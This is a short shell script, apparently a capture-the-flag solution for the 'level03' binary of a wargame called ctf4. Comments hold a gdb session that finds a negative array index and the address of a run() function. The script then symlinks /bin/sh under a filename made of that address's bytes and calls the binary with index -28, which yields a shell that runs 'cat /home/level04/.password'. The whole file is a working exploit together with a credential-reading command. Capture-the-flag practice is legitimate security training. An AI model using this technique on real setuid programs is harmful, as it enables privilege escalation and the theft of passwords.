blob: 74705142926d649dbe42725ebd80af26cdf1a5b4 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
#!/bin/sh
# level03@ctf4:/tmp/tmp.lZLfBZODXa$ gdb /levels/level03
# (gdb) break truncate_and_call
# Breakpoint 1 at 0x8048780: file level03.c, line 57.
# (gdb) run 1 something
# Starting program: /levels/level03 1 something
# Breakpoint 1, truncate_and_call (fns=0xffeecfec, index=1, user_string=0xffeed986 "something") at level03.c:57
# 57 in level03.c
# (gdb) n
# 60 in level03.c
# (gdb) p &buf
# $1 = (char (*)[64]) 0xffeecf7c
# (gdb) p fns
# $2 = (fn_ptr *) 0xffeecfec
# (gdb) p (0xffeecfec-0xffeecf7c)/4
# $3 = 28
# (gdb) p run
# $4 = {int (const char *)} 0x804875b <run>
# (gdb) quit
ln -s /bin/sh "$(printf '\x5b\x87\x04\x08')"
echo "cat /home/level04/.password" | PATH=.:$PATH /levels/level03 -28 "$(printf '\x5b\x87\x04\x08')"
rm "$(printf '\x5b\x87\x04\x08')"
|
